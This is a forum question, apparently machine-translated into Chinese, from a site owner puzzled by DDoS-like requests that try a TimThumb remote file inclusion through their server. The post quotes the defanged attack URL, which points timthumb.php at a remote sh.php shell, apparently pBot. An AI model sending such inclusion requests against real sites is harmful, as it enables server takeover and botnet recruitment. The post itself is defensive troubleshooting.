我的服务器(mediaquarter.at)目前正在被类似请求(有一些小的变化)的DDoSed:hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/ ?timthumb/timthumb.php SRC = HTTP://blogger.com.midislandrental.com/.mods/sh.php(URL “无效”,所以没有人能不小心点击)通过另一台服务器的远程文件包含?
当心,如果你尝试下载引用的PHP文件:在preg_replace中激活了/ e开关,代码包含多个eval语句 - 在您想要查看它之前将其清理干净!看起来像pBot,你可以在这里找到更多关于它的信息:http://www.offensivecomputing.net/?q=node/1417
TimThumb易受远程文件包含(http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability- used-as-botnet-recruitment-vector /) - 在WordPress中似乎相当普遍。所以我会理解有人调用hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src = http://blogger.com.midislandrental.com/.mods/sh.php来利用该漏洞。
但是,试图通过另一个网站(mediaquarter.at)调用它只会导致404错误消息,这有什么意义?此外,我的服务器没有运行WordPress,但SilverStripe取而代之,所以这似乎是毫无意义的。
这只是一个错误/愚蠢的攻击者的一面,或者我忽略了某种类型的攻击载体吗?
PS:服务器只是一些便宜的虚拟主机,我根本无法达到它,所以我无法验证系统上是否有任何更改。
是不是serverfault更好的地方问这个问题? – Lukman 2011-12-14 01:14:19
我主要感兴趣的是你为什么要通过另一个主机调用RFI,而这个主机不受漏洞的影响。所以我认为这比编辑部分更适合编程部分... – xeraa 2011-12-14 01:27:27